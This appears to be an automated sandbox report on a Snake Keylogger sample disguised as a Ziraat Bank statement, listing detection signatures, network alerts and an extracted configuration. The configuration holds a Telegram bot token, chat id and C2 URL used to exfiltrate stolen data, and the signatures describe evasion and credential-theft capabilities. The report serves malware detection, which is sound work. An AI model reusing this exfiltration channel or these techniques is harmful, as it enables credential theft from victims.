Windows Analysis Report
ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe

Overview

General Information

Sample name: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
renamed because original name is a hash value
Original sample name: ziraat bankasi_TRY Mteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Analysis ID: 1519312
MD5: b1ef1a6ce1c1851c95cb5625bc06e69d
SHA1: feec17f1cea1f7e586a22b7970c3f8caa078a72f
SHA256: 597e62b3b65a0231ecd15b165241f46858d133ff7cea5762b9d90819e5a470ff
Tags: exeuser-lowmal3
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Moves itself to temp directory
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc", "Chat_id": "-4209622687", "Version": "5.1"}
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7124.3.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendMessage"}
Multi AV Scanner detection for submitted file
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe ReversingLabs: Detection: 32%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49735 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RRye.pdb source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Source: Binary string: RRye.pdbSHA256 source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F33640h 3_2_06F33228
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F30D0Eh 3_2_06F30B30
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F31698h 3_2_06F30B30
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F31AF9h 3_2_06F31848
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F32C79h 3_2_06F329C8
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F3E961h 3_2_06F3E6B8
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_06F30673
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F3E0B1h 3_2_06F3DE08
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F3F211h 3_2_06F3EF68
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F31F59h 3_2_06F31CA8
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F32819h 3_2_06F32568
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F33640h 3_2_06F3356E
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F3D801h 3_2_06F3D558
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F3E509h 3_2_06F3E260
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F33640h 3_2_06F33218
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F3F669h 3_2_06F3F3C0
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F3EDB9h 3_2_06F3EB10
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_06F30854
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_06F30040
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F3FAC1h 3_2_06F3F818
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F33640h 3_2_06F331F8
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F3DC59h 3_2_06F3D9B0
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F3D3A9h 3_2_06F3D100
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 4x nop then jmp 06F323B9h 3_2_06F32108

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49795 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49760 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49804 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49766 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49810 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49758 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49765 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49790 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49767 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49802 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49768 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49784 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49772 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49763 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49791 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49776 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49805 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49757 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49799 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49824 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49785 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49756 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49777 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49821 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49779 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49858 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49783 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49868 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49792 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49809 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49801 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49771 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49761 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49762 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49782 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49835 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49859 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49775 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49812 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49864 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49862 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49872 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49863 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49808 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49817 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49825 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49807 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49831 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49759 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49778 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49815 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49803 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49867 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49886 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49789 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49780 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49818 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49839 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49816 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49855 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49874 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49849 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49829 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49860 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49769 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49847 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49800 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49770 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49764 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49833 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49861 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49880 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49899 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49919 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49879 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49822 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49830 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49901 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49844 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49788 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49869 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49888 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49774 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49838 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49907 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49891 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49900 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49882 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49826 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49848 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49797 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49856 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49890 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49903 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49842 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49914 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49893 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49871 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49827 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49794 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49896 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49841 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49837 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49906 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49865 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49922 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49781 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49845 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49909 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49806 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49787 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49823 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49850 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49913 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49921 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49852 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49786 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49820 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49851 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49875 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49894 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49887 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49917 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49846 -> 149.154.167.220:443
